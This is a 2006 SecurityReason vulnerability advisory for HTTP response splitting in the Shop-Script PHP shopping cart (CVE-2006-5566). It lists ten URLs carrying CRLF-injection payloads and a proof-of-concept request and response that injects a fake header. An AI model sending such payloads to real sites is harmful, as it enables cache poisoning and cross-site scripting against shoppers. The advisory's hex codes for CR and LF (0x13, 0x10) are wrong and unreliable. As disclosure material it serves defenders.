|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 1791 CVE : CVE-2006-5566 SecurityRisk : Low  (About) Remote Exploit : Yes Local Exploit : No Exploit Available : Yes Credit : Debasis Mohanty (debasis mohanty listmails gmail com) Published : 31.10.2006
Advisory Content : Vendor: Shop-Script (a division of WebAsyst LLC) Application: Shop-Script (www.shop-script.com) I. Descriptions: Shop-Script is a PHP based shopping cart. Multiple links of shop-script are vulnerable to a new form of application attack technique called HTTP Response splitting (aka CRLF Injection). HTTP Response Splitting enables an attacker to alter the HTTP response header structure which can leads to various range of attacks such as web cache poisoning, temporary defacement, hijacking pages or cross-site scripting (XSS). This happens since the user input is injected into the value section of http header without properly escaping/removing CRLF characters which can leads to two HTTP responses instead of one response. II. Affected Links: POST /premium/index.php?links_exchange=%0d%0aFakeHeader:Fake_Custom_Header HTTP/1.0 POST /premium/index.php?news=%0d%0aFakeHeader:Fake_Custom_Header HTTP/1.0 POST /premium/index.php?search_with_change_category_ability=%0d%0aFakeHeader: Fake_Custom_Header HTTP/1.0 POST /premium/index.php?logging=%0d%0aFakeHeader:Fake_Custom_Header HTTP/1.0 POST /premium/index.php?feedback=%0d%0aFakeHeader:Fake_Custom_Header HTTP/1.0 POST /premium/index.php?show_price=%0d%0aFakeHeader:Fake_Custom_Header HTTP/1.0 POST /premium/index.php?register=%0d%0aFakeHeader:Fake_Custom_Header HTTP/1.0 POST /premium/index.php?answer=%0d%0aFakeHeader:Fake_Custom_Header&save_v oting_results=yes HTTP/1.0 POST /premium/index.php?productID=%0d%0aFakeHeader:Fake_Custom_Header HTTP/1.0 POST /premium/index.php?searchstring=<any_keyword>&inside=%0d%0aFakeHeade r:Fake_Custom_Header HTTP/1.0 III. Proof-of-concept: [Request Header] POST /premium/index.php?links_exchange=%0d%0aFakeHeader:Fake_Custom_Header HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.shop-script-demo.com Content-Length: 18 Cookie: PHPSESSID=e0d1c748db4ce6fa7886403e65458aaa Connection: Close Pragma: no-cache current_currency=1 [Response Header] HTTP/1.1 302 Found Date: Mon, 16 Oct 2006 17:39:57 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Location: index.php?links_exchange= FakeHeader:Fake_Custom_Header <= [Custome remsponse injected by the attacker] Content-Length: 0 Connection: close Content-Type: text/html IV. Remediation: Sanitize CR(0x13) and LF(0x10) from the user input or properly encode the output in order to prevent the injection of custom HTTP headers. V. Reference: http://www.securiteam.com/securityreviews/5WP0E2KFGK.html VI. Credits: Debasis Mohanty (aka Tr0y) www.hackingspirits.com For more vulnerabilities visit - http://hackingspirits.com/vuln-rnd/vuln-rnd.html  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
libc:fts_*() Multiple Denial of Service
The fts functions are provided for traversing UNIX file hierarchies... |
||
| Apache |  |
|
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
| PHP | |
|
» PHP 5.2.12/5.3.1 |
||
- 2009-10-02| Copyright © SecurityReason.com. All Rights Reserved. |